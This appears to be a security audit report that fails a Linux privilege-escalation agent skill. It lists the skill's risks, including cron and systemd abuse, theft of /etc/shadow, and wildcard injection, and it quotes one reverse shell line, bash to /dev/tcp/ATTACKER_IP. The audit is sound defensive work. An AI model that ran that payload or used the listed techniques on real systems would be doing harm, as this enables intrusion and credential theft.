linux-cron-service-abuse
Fail
Audited by Gen Agent Trust Hub on Jul 6, 2026
Risk Level: CRITICALCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: Instructions provide commands for modifying sensitive system files including /etc/crontab, systemd unit files, and init scripts to execute arbitrary code with root privileges.
- [REMOTE_CODE_EXECUTION]: The skill includes explicit reverse shell payloads (bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1) designed to grant remote access to an attacker.
- [DATA_EXFILTRATION]: Methods are detailed for exfiltrating the system shadow file (/etc/shadow) using techniques like symbolic link creation and zip/7z file list injection.
- [CREDENTIALS_UNSAFE]: The skill specifically targets the retrieval of root-level credentials and sensitive files, including the system's hashed password file.
- [EXTERNAL_DOWNLOADS]: The content directs users to download external exploitation tools such as pspy and third-party privilege escalation exploits from public GitHub repositories.
- [COMMAND_EXECUTION]: Advanced exploitation techniques like wildcard injection are documented for tools such as tar, rsync, and zip, which can be leveraged to execute shell scripts as a root user.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
Audit Metadata